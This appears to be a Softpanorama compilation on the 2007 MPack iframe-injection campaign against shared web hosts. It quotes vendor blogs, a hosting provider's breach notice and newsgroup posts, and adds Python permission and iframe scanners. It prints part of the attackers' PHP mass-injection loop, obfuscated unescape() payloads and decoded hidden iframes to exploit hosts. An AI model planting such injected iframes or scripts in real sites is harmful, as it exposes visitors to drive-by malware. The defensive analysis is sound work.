In July 2007 there was a new massive hacking attack on web sites. This attack targeted primarily budget web hosting providers, but it was not limited to them: for example, several sites from HBS were compromised too. SANS has another List Of Compromised Sites.
It looks like the attack usually has two stages.
This attack stresses the fact that Web browsers should now be installed in a VM and used with a special disposable Windows image. Please consider using Microsoft Virtual PC or VMware and opening a separate OS instance for browsing if you have not done so already.
The best description of the first phase that I found is from Hosting Reviews at Hostjury.com - Blog and is related to Dreamhost. In no way should you consider that Dreamhost was alone. They were just more open about it and I would give them high credit. Most other providers affected tried to sweep the dirt under the carpet.
According to an e-mail sent out to many Dreamhost clientele earlier today there have been over 3,500+ hosting accounts exploited at Dreamhost.
The suspected entry point into the accounts was most likely password sniffing however there are many other rumors surrounding the event.
This exploit quickly followed a recent exploit of IPowerWeb that resulted in the defacement of over 35% of the IPowerWeb client base. Earlier this year exploits affected Hostgator & many other large providers whose systems were rooted.
A copy of the e-mail sent out by the dreamhost team is below:
From: DreamHost Security Team
Subject: URGENT: FTP Account Security Concerns…
This email is regarding a potential security concern related to your 'XXXX' FTP account. We have detected what appears to be the exploit of a number of accounts belonging to DreamHost customers, and it appears that your account was one of those affected.
We're still working to determine how this occurred, but it appears that a 3rd party found a way to obtain the password information associated with approximately 3,500 separate FTP accounts and has used that information to append data to the index files of customer sites using automated scripts (primarily for search engine optimization purposes).
Our records indicate that only roughly 20% of the accounts accessed - less than 0.15% of the total accounts that we host - actually had any changes made to them. Most accounts were untouched.
We ask that you do the following as soon as possible:
- Immediately change your FTP password, as well as that of any other accounts that may share the same password. We recommend the use of passwords containing 8 or more random letters and numbers. You may change your FTP password from the web panel ("Users" section, "Manage Users" sub-section).
- Review your hosted accounts/sites and ensure that nothing has been uploaded or changed that you did not do yourself. Many of the unauthorized logins did not result in changes at all (the intruder logged in, obtained a directory listing and quickly logged back out) but to be sure you should carefully review the full contents of your account.
Again, only about 20% of the exploited accounts showed any modifications, and of those the only known changes have been to site index documents (ie. 'index.php', 'index.html', etc - though we recommend looking for other changes as well).
It appears that the same intruder also attempted to gain direct access to our internal customer information database, but this was thwarted by protections we have in place to prevent such access. Similarly, we have seen no indication that the intruder accessed other customer account services such as email or MySQL databases.
In the last 24 hours we have made numerous significant behind-the-scenes changes to improve internal security, including the discovery and patching to prevent a handful of possible exploits.
We will, of course, continue to investigate the source of this particular security breach and keep customers apprised of what we find. Once we learn more, we will be sure to post updates as they become available to our status weblog: http://www.dreamhoststatus.com/
Thank you for your patience. If you have any questions or concerns, please let us know.
In the second stage the pool of harvested passwords is used to modify certain files. We will call this stage "mass modification of index files". It looks like this stage was automated and that they used a special tool, called MPACK, to install malicious IFrames. Usually only the main site index documents were targeted (i.e. index.php, index.html, index.shtml, etc.). Malicious IFrames are usually inserted at the beginning or at the end of the document; that might be due to different tools or different versions/modes of operation of MPACK. But there are other cases where all documents were modified by replacing the </body> tag [SANS Internet Storm Center]:
After checking where the compromised web sites were hosted, it became clear to us that we were dealing with a mass defacement when a single (or multiple) physical web servers were hosting thousands of web sites.
One of our readers sent us a PHP script he acquired from a compromised web server. The PHP script is pretty simple, and all it does is traverse through the file system and modify all files so that a malicious iframe tag is appended.
Two things were obvious here:
- The hosting web server did not have proper security on the file system level. This is, unfortunately, pretty common for (cheap?) hosting servers and is required when PHP is executed as a module in Apache. In this case, the main Apache process must be able to at least read all the files, but it appeared that it was able to write to them as well (wrong file permissions maybe?).
- The attackers had to find only one vulnerable PHP script on the server (note – the server might have been hosting thousands of different web sites).
Once attackers found a vulnerable PHP script they first detected the directory hierarchy on the web site. In case of the sample PHP script we received, it looked like this:
for ($i = 3; $i < 500; $i++) {
    if ($i == 438) continue;
    flush_buffer('<b>/home/sites/site' . $i . '/web</b>:<br>');
    iframe_account(array('/home/sites/site' . $i . '/web'));
}
From the code snippet above, you can see that all sites have their document root directory set as /home/sites/site[number]/web. The loop creates an array which is then passed to another function called iframe_account().
This function takes every directory and performs a recursive search for 4 file types:
$file_types = array('php', 'htm', 'html', 'tpl');
It then opens the files and searches for the "</body>" tag which is replaced with the malicious iframe and properly closed:
$iframed_content = str_replace('</body>', '<iframe src=http://[REMOVED].info/counter style=display:none></iframe></body>', $content);
And voila – a mass compromise happened.
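Defensive counterpart to the ISC observation above (the Apache process could write to every site's files), as an added example that is not ISC's or any hosting provider's code: a Python audit that walks per-site document roots laid out as /home/sites/site<N>/web and reports every file or directory the web-server account could write by the classic mode bits. The sample tree, its modes and the uid/gid used for the "web server" are constructed for the demonstration.

```python
import os
import stat
import tempfile


def writable_by(st, uid, gids):
    """True if a process running as uid with group set gids may write the inode
    described by st, judged from the owner/group/other mode bits only
    (POSIX ACLs and capabilities are not examined)."""
    mode = st.st_mode
    if st.st_uid == uid:
        return bool(mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def audit_docroots(root, uid, gids, web_dir='web'):
    """Return sorted paths (relative to root) under root/<site>/<web_dir> that the
    given account could write.  Directories are reported too: a writable directory
    lets the account drop or replace files even when every file inside is read-only."""
    exposed = []
    for site in sorted(os.listdir(root)):
        docroot = os.path.join(root, site, web_dir)
        if not os.path.isdir(docroot):
            continue
        for dirpath, _dirnames, filenames in os.walk(docroot):
            for path in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
                if writable_by(os.lstat(path), uid, gids):
                    exposed.append(os.path.relpath(path, root))
    return sorted(exposed)


# Constructed layout mirroring /home/sites/site<N>/web from the quoted script:
# relative path -> mode.  site1 is correct; site2 and site3 show the two mistakes.
SAMPLE_LAYOUT = {
    'site1/web': 0o755, 'site1/web/index.html': 0o644,  # server can read, not write
    'site2/web': 0o755, 'site2/web/index.html': 0o666,  # anyone can rewrite the index
    'site3/web': 0o777, 'site3/web/index.html': 0o644,  # anyone can replace files in it
}


def build_sample_tree(root=None):
    """Create SAMPLE_LAYOUT under a fresh temporary directory and return its path."""
    root = root or tempfile.mkdtemp(prefix='sites-')
    for rel, mode in SAMPLE_LAYOUT.items():
        path = os.path.join(root, rel)
        if rel.endswith('/web'):
            os.makedirs(path, exist_ok=True)
        else:
            with open(path, 'w') as fh:
                fh.write('<html><body>site</body></html>\n')
        os.chmod(path, mode)  # explicit, so the umask does not decide the outcome
    return root


def demo():
    """Audit the sample tree as an account that owns none of the files (the Apache
    user on a shared host); expected: ['site2/web/index.html', 'site3/web']."""
    root = build_sample_tree()
    owner = os.stat(root)
    return audit_docroots(root, uid=owner.st_uid + 1, gids={owner.st_gid + 1})


def demo_as_owner():
    """Same audit as the owning account: everything is writable, which is exactly
    why the web server must not run as the account that owns the sites."""
    root = build_sample_tree()
    owner = os.stat(root)
    return audit_docroots(root, uid=owner.st_uid, gids={owner.st_gid})
```

On a real host, run it against /home/sites with the uid and groups of the account Apache actually runs as; an empty result for that account is the condition under which one vulnerable PHP script can no longer rewrite every site on the box.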
Here is how the Symantec Security Response Weblog describes the tool:
You always thought that by staying clear of the dark alleys of the Internet and visiting only "reputable" websites, you would be safe from attacks and dubious content. I am afraid that is not enough. My colleagues Elia Florio and Hon Lau reported recently (here and here) about legitimate sites that had been compromised to include a malicious IFRAME that, without your knowledge, redirects you to a site serving exploits. As Elia mentioned, thousands of sites (mostly Italian, but with several other nationalities included) were compromised. We were puzzled as to how the MPack gang had managed to hack so many sites in a short period of time, and how they could inject the malicious iframe so quickly.
The MPack gang appears to be using an IFRAME Manager tool to automate the task on a large scale. This is basically an FTP updater client, written in PHP language, that runs on a webserver with MySQL as back-end. It takes as input a list of website administrator accounts (possibly obtained in the black market). It then periodically checks the home pages of those sites to inject a chosen IFRAME into their code.
This iframe manager is another example of a very user-friendly tool with a clear intent of being resold to multiple hacking groups. As such, it offers a number of interesting features. It allows for the iframe to be injected at the top or bottom of the page and you can use regular expressions when defining the pages to be compromised, such as index[.php|.htm|.html]|default.asp. To maximize the return-on-investment, the tool can check the Google PageRank for the potential websites before injecting the iframe, allowing you to select any number of sites with a certain PageRank in a certain country. Furthermore, the tool can be left running and will cycle through the list of sites and re-inject the iframe, should the pages have been cleaned by the site administrator.
To assist the miscreants in this competitive hacker-eat-hacker world, the tool also allows for the removal of any competitors' iframes injected in the page. And of course, extensive logs and statistics are provided.
This tool itself however, cannot hack the websites; it relies on a list of compromised credentials to insert the desired iframe into the websites. Therefore a simple clean-up of the page is not sufficient; the site administrator's credentials need to be changed. To protect yourself as a web surfer, make sure your operating system is up to date with latest patches as well as your anti-virus program.
Posted by Amado Hidalgo on June 19, 2007 11:39 AM
The actual exploit is an encoded IFRAME pointing to the web site with malware.
"Right now, we are not sure whether the porn sites are compromised to host the IFRAMES, are created to do so, or are being paid to host the IFRAMES," acknowledged Trend Micro. The attack probably began June 17, the company said.
Other researchers have continued to dig into the Mpack-based attacks and have shared some of their findings. Symantec, for instance, asked how hackers were able to infect so many sites in such a short time, and how they could inject the necessary IFRAMES code -- the malicious code they added to the legitimate sites' HTML that redirected visitors to the Mpack server -- so quickly.
Pages in hacked web sites are modified using an IFRAME to connect to one of many "seed sites" which run scripts that either:
<script type="text/javascript">
<!--
document.write(unescape('%3C%69%66%...'));
//-->
</script>
That will give some assurance that this exploit was used only on the index document of your web site and was not replicated on other pages.
telnet www.mysite.com 80
12:12
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>501 Method
Not Implemented</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
♥ to /index.html not supported.<P>
Invalid method in request \x03<P>
<HR>
<ADDRESS>Apache/1.3.33
Server at myhost.myisp.com Port 80</ADDRESS>
</BODY></HTML>
Connection to host lost.
Here you can see that the version of the web server is old. That does not necessarily mean that it is vulnerable, but it is still of some concern (the latest is 1.3.37).
The encoded fragment that you have found can be decoded via many sites; for example you can use HTML & JavaScript Encoder-Decoder. In the case of the exploit listed above the actual code is as follows:
<iframe src="http://fotballportal.info/out.php?s_id=1"
style="visibility: hidden; display: none">
</iframe>
That means that you need to block 203.121.73.33 to reduce the chance of infecting users in case of reinfection.
ISPs which do not provide users with shell access might be hurt if such attacks become recurrent, as this is in essence an attack on the business model of cheap, reliable hosting, where part of the reliability is achieved by not providing ssh access to users.
I would propose several steps that can compensate for the lack of shell access:
Sophos, meanwhile, analyzed the nearly 4,000 compromised sites it had found delivering the malicious IFRAMES code, and found that the overwhelming majority -- 98 percent to be exact -- were running the Apache Web server. "The servers targeted in this attack have almost exclusively been running some flavor of Apache on Unix," said Sophos in a blog entry <http://www.sophos.com/security/blog/2007/06/250.html> Friday.
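An added example, not code from the original page: a Python scanner that performs the check described above (is the encoded IFRAME only in the index document, or replicated on other pages?) and decodes the unescape() payload locally rather than through a web site, so the host to block is read straight from the file. The site it scans is constructed for the demonstration, using the fotballportal iframe above and the hex literal quoted later on this page.

```python
import os
import re
import tempfile

# File types the ISC-quoted script rewrote, plus .shtml, which the text above names.
SCAN_EXTENSIONS = ('.php', '.htm', '.html', '.shtml', '.tpl')

_ESC_RE = re.compile(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})')
_WRITE_RE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1\s*\)\s*\)",
    re.IGNORECASE | re.DOTALL)
_IFRAME_TAG_RE = re.compile(r'<iframe\b[^>]*>', re.IGNORECASE)
_SRC_RE = re.compile(r'\bsrc\s*=\s*["\']?\s*([^"\'\s>]+)', re.IGNORECASE)
# Attributes that hide the frame from the visitor (display:none or a 1x1 / 0x0 box).
_HIDDEN_RE = re.compile(
    r'display\s*:\s*none|visibility\s*:\s*hidden'
    r'|\b(?:width|height)\s*=\s*["\']?[01]["\']?(?=[\s>])', re.IGNORECASE)


def js_unescape(text):
    """Decode like JavaScript unescape(): %XX -> chr(0xXX), %uXXXX -> chr(0xXXXX)."""
    return _ESC_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def find_iframes(html):
    """Return (src, hidden) for every <iframe ...> tag in html."""
    frames = []
    for tag in _IFRAME_TAG_RE.findall(html):
        src = _SRC_RE.search(tag)
        frames.append((src.group(1) if src else '', bool(_HIDDEN_RE.search(tag))))
    return frames


def scan_text(content):
    """Findings for one file: each decoded unescape() payload with the iframe
    targets it expands to, plus any hidden iframe written directly into the file."""
    findings = []
    for m in _WRITE_RE.finditer(content):
        # A wrapped listing may have split the literal; JS would not, so drop whitespace.
        decoded = js_unescape(re.sub(r'\s+', '', m.group(2)))
        findings.append({'kind': 'unescape', 'decoded': decoded,
                         'targets': [src for src, _ in find_iframes(decoded)]})
    hidden = [src for src, is_hidden in find_iframes(content) if is_hidden]
    if hidden:
        findings.append({'kind': 'hidden-iframe', 'targets': hidden})
    return findings


def scan_tree(root):
    """Walk a document root; map each suspicious file (relative path) to its findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding='latin-1') as fh:  # latin-1 never fails on raw bytes
                found = scan_text(fh.read())
            if found:
                report[os.path.relpath(path, root)] = found
    return report


# Constructed sample site, not real customer files: index.html carries the hex
# literal quoted later on this page, index.php the decoded fotballportal frame
# shown above; about.html is clean and logo.png has an extension that is skipped.
SAMPLE_SITE = {
    'index.html': (
        '<html><body><h1>Welcome</h1>\n'
        '<script language="javascript">document.write(unescape('
        "'%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68"
        "%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34"
        "%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D"
        "%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D"
        "%22%30%22%20%77%69%64%74%68%3D%22%31%22%20"
        "%68%65%69%67%68%74%3D%22%31%22%20%73%63%72"
        "%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61"
        "%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69"
        "%66%72%61%6D%65%3E'));</script></body></html>\n"),
    'index.php': (
        "<?php include 'header.php'; ?>\n<p>Shop</p>\n"
        '<iframe src="http://fotballportal.info/out.php?s_id=1"\n'
        ' style="visibility: hidden; display: none">\n</iframe>\n'),
    'about.html': '<html><body><p>About us</p></body></html>\n',
    'logo.png': 'binary data, not scanned\n',
}


def build_sample_site(root=None):
    """Write SAMPLE_SITE into a fresh temporary directory and return its path."""
    root = root or tempfile.mkdtemp(prefix='webroot-')
    for name, text in SAMPLE_SITE.items():
        with open(os.path.join(root, name), 'w', encoding='latin-1') as fh:
            fh.write(text)
    return root


def demo():
    """Scan the constructed site; returns findings for index.html and index.php only."""
    return scan_tree(build_sample_site())
```

Point scan_tree() at a real document root and every file it names, not just index.*, needs cleaning; the 'targets' list is what goes into the block list.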
That might be just a side effect of the fact that this attack targeted budget ISPs.
22 June 2007 11:42 GMT
For the past 7 weeks SophosLabs have been tracking an attack targeting sites all over the world. In the attack, legitimate sites have been compromised so that they serve up a malicious JavaScript (Mal/ObfJS-C). In this post, I present a brief summary of the data obtained thus far.
Since May 1st, we have found 3,896 URLs that have been compromised, over 1,627 different domains. The subject matter of the hacked sites covers as wide a range of topics as you can imagine. Clothes boutiques, driving instruction, nude beauty pageants, celebrity gossip, hypnotherapy through to handmade musical instruments. Most worryingly, there are some fairly popular sites within the list, including a fairly large bank (this site was hacked last week). Taking a deeper look at the data, we can gather further information about this campaign.
As you can see from the following graph (note the log scale on the y-axis), the vast bulk of the compromised pages are being served up from sites in the United States, closely followed by Brazil, Canada and the UK.
It should be noted this data is based on the country in which the host web server resides - it does not indicate the locale of the site itself. For example, several '.co.uk' domains were found to be hosted within the US.
To get a true impression of the scale of such an attack, looking at domain names alone is insufficient. We have encountered previous cases where initial data based on a plethora of compromised domains has suggested a large campaign, only to find that they were all the result of the hacking of a handful of boxes within a single service provider (Troj/EncIfr-A for example). Looking at this data from an IP perspective reveals 324 unique IP addresses, the bulk of which are hosting a low number of compromised sites.
As might be expected, we can see that in several cases, once the hackers have managed to hack a server, they have compromised several sites hosted there.
Probing further, we can try to identify the operating system and web server application. As you can see below, the servers targeted in this attack have almost exclusively been running some flavour of Apache on Unix.
Though we cannot deduce the method employed by the hackers to compromise the servers, such data is nonetheless interesting. Gathering and analysis of such data provides us with valuable information to assist in the fight against web attacks. As ever, it is imperative that web servers are maintained and patched to the latest level. If you outsource the responsibility of this to your ISP, ensure they follow good practice. Remember, their failure could lead to your loss of credibility if it is your site that gets hacked into a malicious drive-by.
Fraser, SophosLabs UK
Could someone help me out and tell me what this is:
<html>
<body>
<script>
document.write(unescape("%3c..."));
</script>
</body>
</html>
Nir wrote:
> Andrés M. wrote:
>> Hello, This morning I opened Thunderbird and went to the m.s.firefox
>> newsgroup. I clicked first on the mail with subject "Could this
>> exploit code from a malware site affect Firefox?" and while the mail
>> window was blank and still loading I immediately clicked on the mail
>> with subject "Really really really annoying and persistent display
>> problem...". Almost instantly the latter mail was on screen. Then
>> clicked on the Back button to see the first mail and what I got was a
>> mix of the first half of the first mail with the full content of the
>> second mail (including header) appended below. The resulting content
>> is pasted at the end of this mail. The header of the second mail may
>> be a little different, I copied it manually from an exported text
>> file of the second mail. Look for the word "unescaping" to reach the
>> point where both mails got mixed.
>> I am unable to reproduce this strange event again, but it definitely
>> happened so I wonder if someone can take a look at it.
> either an extensions is causing this -
> "https://bugzilla.mozilla.org/show_bug.cgi?id=370473#c0"
> or it's the theme, you are using , which is misbehaving -
> "https://bugzilla.mozilla.org/show_bug.cgi?id=352694#c36"
> "https://bugzilla.mozilla.org/show_bug.cgi?id=352694#c23"
Oops, sorry I forgot to mention but I'm using Thunderbird 2.0.0.4
completely clean, no extra themes and no add-ons except "Talkback" which
comes with the installer. Thanks for your reply, but add-ons are certainly not the cause.
From: Chris Jahn <clj...@netscape.net.invalid>
Date: Sun, 24 Jun 2007 22:00:23 -0500
Newsgroups: mozilla.support.firefox
Subject: Re: Could this exploit code from a malware site affect Firefox?
"OMA" <omol...@inicia.es> wrote in
news:[email protected]:
> I'd like to know if that code could exploit any vulnerability
> in Firefox, and thus if it may have affected my system.
No. In IE, clicking on the executable would run it. In FF, you
can only download an executable file, then you have to browse to
the saved file and click it yourself, manually.
--
Mozilla & Netscape FAQs: http://www.ufaq.org/
Mozilla/Firefox/Thunderbird/Seamonkey solutions: http://ilias.ca/
Web page validation: http://validator.w3.org
About Mozilla: http://www.mozilla.org
Ambition is a poor excuse for not having the good sense to be lazy.
From: Aggro <spammerdr...@yahoo.com>
Date: Mon, 25 Jun 2007 17:48:44 +0300
Newsgroups: mozilla.support.firefox
Subject: Re: Could this exploit code from a malware site affect Firefox?
OMA wrote:
> Hello, I've accidentally entered a malware site by following an e-mail link
> to www.duhymn.hk (be careful NOT to enter that site with a browser).
> When I entered the site with Firefox 2.0.0.4, the browser immediately
> froze.
There seems to be a large loop. That probably caused your browser to
freeze. Freezing is not an indication that they managed to do something to
your computer. It looks like "Internet Explorer createControlRange Object Buffer Overflow":
http://www.juniper.net/security/auto/vulnerabilities/vuln1850.html
So probably only IE users are in danger. I didn't read the whole code,
so I don't know if there is something else also. But I very much doubt
that you would be in danger as you were using 2.0.0.4.
--
Solutions for issues with Firefox:
http://kb.mozillazine.org/Category:Issues_%28Firefox%29
WOW this is ALL from omega-it.ru, Wow I feel sorry for that computer network.
We got warezov and zhelatin and nuwar, ircbot, magnoia, and lineage, spys and bankers and a few sdbots. wow just from one computer network
Ethan Zuckerman has a fascinating story about how contemporary malware works. It begins with him Googling a friend to find the URL of her home page, only to find that Google wouldn't connect him to her site and flashed up the warning "This site may harm your computer". It transpired that this is the result of the StopBadware campaign run by the folks at the Berkman Center; Google identifies sites that it believes are spreading malware and registers them with Stop Badware. If a site has been blacklisted, its owner has the option of protesting and having his/her case reviewed by the Berkman people. Ethan duly protested on his friend's behalf…
Within half an hour, three of my colleagues pointed me to the source code of my friend's page. At the top of her index page was a strange-looking piece of Javascript:
<script language="javascript"> document.write( unescape(
'%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68
%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34
%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D
%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%22%30%22%20%77%69%64%74%68%3D%22%31%22%20
%68%65%69%67%68%74%3D%22%31%22%20%73%63%72
%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61
%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69
%66%72%61%6D%65%3E'
) ); </script>
That's some seriously obfuscated Javascript. But if you translate from hexadecimal to ASCII, the code's pretty clear - it inserts the following code into the top of the HTML page:
<iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
The code opens an "iframe", an inline frame which allows another web page to be embedded within a page - iframes are pretty useful things, especially for building interactive applications in web pages. But this frame is pretty sinister. It opens a one pixel by one pixel frame which attempts to load the webpage located at http://81.95.146.98/index.html.
That page doesn't load on my browser - the server is apparently refusing connections, at least from my Macintosh - but it occupies an IP in a block of addresses controlled by a charming bunch of guys who do business as RBusiness Network. Google for them and you'll mostly find lots of angry message board posts from spamfighters - the RBusiness folks operate a number of servers advertised in spam emails and are suspected of relaying large amounts of spam. Many of the RBusiness- associated webpages are in Russian, though their servers are currently in Panama City, Panama - some antispammers believe that RBusiness is short for "Russian Business Network", which was evidently their previous operating name.
Googling for the specific IP - 81.95.146.98 - turns up a couple of pages with people documenting an interesting exploit - the Microsoft Data Access Components exploit. Basically, when you load this iframe, it runs a small script which downloads and runs a Windows executable file. That file downloads a rootkit, a password sniffer and opens a backdoor into the user's system. (Needless to say, this only happens on Microsoft Windows systems running unpatched software… which is to say, many Windows systems.) According to Ivan Macalintal, this iframe was installing code from websites that looked fairly innocuous, including one that promised to help you write your company's travel policy. (Remarkably, this site is the #1 match for a search for "travel policy" on Google, though Google doesn't let you click directly to the page, stopping you with a "harm your computer" message.)
It's possible that this is what my friend's site was trying to install - Ivan's report dates from October 2006. It's also possible that it was trying to install a more recent package of malware - Trojan-PSW.Win32.Small.bs - which Avira saw linked to the 81.95.126.98 domain in early January of this year. This little nasty logs passwords entered on webpages, opens a SOCKS proxy on your machine and calls home to an RBusiness server to let the bad guys know how to take advantage of your new machine to send spams and retrieve your passwords.
So had Ethan's friend got into bed with these Russian hoodlums? Unlikely.
Simply put, [her site] was hacked. Not content with setting up websites to spread their trojan horses, the RBusiness boys have been breaking into blog and wiki sites and installing this new iframe. In some cases, they're able to guess default passwords; in other cases, they exploit unpatched bugs in software. I was all ready to go to Berkman yesterday with my tail between my legs and tell my colleagues that my friend's server had been compromised. But my friends were already dealing with the fact that Google had found malicious iframes on a number of Harvard-affiliated sites, including several blogs hosted on the blogs.law.harvard.edu server! Stop Badware, yesterday at least, was stopping Berkman.
Which is deeply ironic, given what the StopBadware initiative was set up to do. But in a way, it only goes to underscore how complex and dangerous our software monoculture has become.
Banner ads appearing on popular European web sites have been directing traffic to sites that install malware on visitors' computers, according to the Internet Storm Center. The attacks are exploiting an unpatched flaw in the way Internet Explorer 6 handles the IFRAME tag. "Some high profile sites with banner ads are linking to servers that have the exploit and malicious code," according to an advisory on the ISC web site. The attack is an expanded version of banner-based exploits that first surfaced earlier this year. Banner networks, with their ability to place code on hundreds of outside sites, offer a vehicle for the rapid distribution of trojans and other malware, as well as a way to deface web pages. It is not clear whether the malicious code was being spread through a compromised ad server, or through specific banners submitted to ad networks.
Site operators are being cautioned to verify that the banners do not contain the IFRAME exploit code, or failing that, temporarily disable banner ads to minimize the risk of accidentally infecting users and propagating the exploit. The ISC did not identify any of the affected sites.
Users clicking on the banners are being infected with variants of the Bofra worm that has been propagating through e-mail and malicious web sites. Bofra appeared just days after the revelation of the IFRAME vulnerability, which affects Internet Explorer 6 on all Windows platforms except Windows XP Service Pack 2 (SP2). This vulnerability allows attackers to gain complete control of a user's computer.
On-line linkscanner:
http://linkscanner.explabs.com/linkscanner/default.asp
But the best you could do:
For home users:
* Beware of pages that require software installation. Do not allow new software installation from your browser unless you absolutely trust both the Web page and the provider of the software.
* Scan with an updated antivirus and anti-spyware software any program downloaded through the Internet. This includes any downloads from P2P networks, through the Web and any FTP server regardless of the source.
* Beware of unexpected strange-looking emails, regardless of their sender. Never open attachments or click on links contained in these email messages.
* Enable the "Automatic Update" feature in your Windows operating system and apply new updates as soon as they are available.
* Always have an antivirus real-time scan service. Monitor regularly that it is being updated and that the service is running.
* Free security tools are available at www.trendmicro.com
http://us.trendmicro.com/us/about/news/pr/article/20070618185040.html
Several hundred pornography sites are surprising unwitting users with a smorgasbord of exploits via Mpack, the already notorious hacker toolkit that launched massive attacks earlier this week from a network of more than 10,000 compromised domains.
Trend Micro has spotted nearly 200 porn domains -- most dealing in incestuous content -- that have either been hacked or are purposefully redirecting users to servers hosting Mpack, a professional, Russian-made collection of exploits that comes complete with a management console.
Even though there are far fewer porn sites in this newly discovered infection chain than in Monday's "Italian Job" attack -- called that because most of the 10,000+ hijacked sites were legitimate Italian domains -- they've managed to infect twice as many end-users' PCs, said Trend Micro in a posting to its malware blog.
"Right now, we are not sure whether the porn sites are compromised to host the IFRAMES, are created to do so, or are being paid to host the IFRAMES," acknowledged Trend Micro. The attack probably began June 17, the company said.
Other researchers have continued to dig into the Mpack-based attacks and have shared some of their findings. Symantec, for instance, asked how hackers were able to infect so many sites in such a short time, and how they could inject the necessary IFRAMES code -- the malicious code they added to the legitimate sites' HTML that redirected visitors to the Mpack server -- so quickly.
"The MPack gang appears to be using an IFRAME manager tool to automate the task on a large scale," said Amado Hidalgo, a Symantec security analyst. The tool, which Hidalgo said was basically an FTP updater using MySQL as a back-end database, regularly checks a large list of sites to inject the malicious IFRAME code.
Hidalgo also spelled out how hackers have been getting into legitimate sites, which puzzled investigators earlier this week. "It takes as input a list of Web site administrator accounts, possibly obtained in the black market," he said. Those administrator accounts are recorded in MySQL, and the manager can be left running so that it re-infects sites that have been purged of the IFRAMES code. "A simple clean-up of the page is not sufficient," advised Hidalgo. "The site administrator's credentials need to be changed."
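As an added, defensive illustration (not code from the page or from any of the vendors it quotes), here is a small Python scanner a site administrator could run over a web root to find the kind of injected IFRAME described above: a frame whose src points off-site and/or that is hidden by size or style. The hostnames and the sample page are constructed placeholders.

```python
# Added example (not from the page or its sources); placeholder hosts are assumed.
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "www.example.com"  # assumed: the legitimate site's own hostname


class IframeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.iframes = []  # one dict of attributes per <iframe> found

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def is_hidden(attrs):
    """Heuristic: 0/1-pixel width or height, or a style that hides the frame."""
    def tiny(v):
        v = v.strip().lower().rstrip("px").strip()
        return v.isdigit() and int(v) <= 1
    style = attrs.get("style", "").replace(" ", "").lower()
    return (tiny(attrs.get("width", "")) or tiny(attrs.get("height", ""))
            or "display:none" in style or "visibility:hidden" in style)


def find_suspicious_iframes(html, site_host=SITE_HOST):
    """Return [(src, reasons)] for iframes that are off-site and/or hidden."""
    parser = IframeFinder()
    parser.feed(html)
    hits = []
    for a in parser.iframes:
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        reasons = []
        if host and host != site_host.lower():
            reasons.append("off-site src")
        if is_hidden(a):
            reasons.append("hidden")
        if reasons:
            hits.append((src, reasons))
    return hits


# Constructed sample page: one legitimate embed, one injected hidden iframe.
SAMPLE_PAGE = """<html><body><h1>Welcome</h1>
<iframe src="http://www.example.com/widget.html" width="300" height="200"></iframe>
<iframe src="http://redirector.invalid/in.cgi?3" width="1" height="1"
        style="visibility: hidden"></iframe></body></html>"""

if __name__ == "__main__":
    for src, why in find_suspicious_iframes(SAMPLE_PAGE):
        print("SUSPICIOUS iframe", src, ", ".join(why))
```

Finding and removing the frames is only half the job: as Hidalgo notes above, the manager tool re-injects them from stored administrator credentials, so those credentials must be changed as well.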
Sophos, meanwhile, analyzed the nearly 4,000 compromised sites it had found delivering the malicious IFRAMES code, and found that the overwhelming majority -- 98 percent to be exact -- were running the Apache Web server. "The servers targeted in this attack have almost exclusively been running some flavor of Apache on Unix," said Sophos in a blog entry Friday. That's not always the case, said Ron O'Brien, senior security analyst at Sophos. "Overall, hacked sites are about evenly split between Apache and [Microsoft] IIS servers, but in this subset it's almost entirely Apache." Another interesting factoid, said O'Brien: "Of all the sites we've tracked that serve malicious code, about 80 percent have been hacked."
Still other researchers rooted out details of Mpack, including its price and the nom-de-plume of its creator. Ken Dunham, director of VeriSign-iDefense's rapid response team, said Mpack sells for around US$1,000, and that the man [or woman] behind it goes by "$ash" in the Russian hacker underground. The latest version of Mpack, .90, includes exploits for eight different vulnerabilities, six of them flaws in Windows or Internet Explorer, including the dangerous ANI bug that affected Vista earlier this year.
"This is a powerful Web exploitation tool," Dunham said.
Copyright © 1996-2021 by Softpanorama Society. www.softpanorama.org was initially created as a service to the (now defunct) UN Sustainable Development Networking Programme (SDNP) without any remuneration. This document is an industrial compilation designed and created exclusively for educational use and is distributed under the Softpanorama Content License. Original materials copyright belong to respective owners. Quotes are made for educational purposes only in compliance with the fair use doctrine.
Last modified: March 12, 2019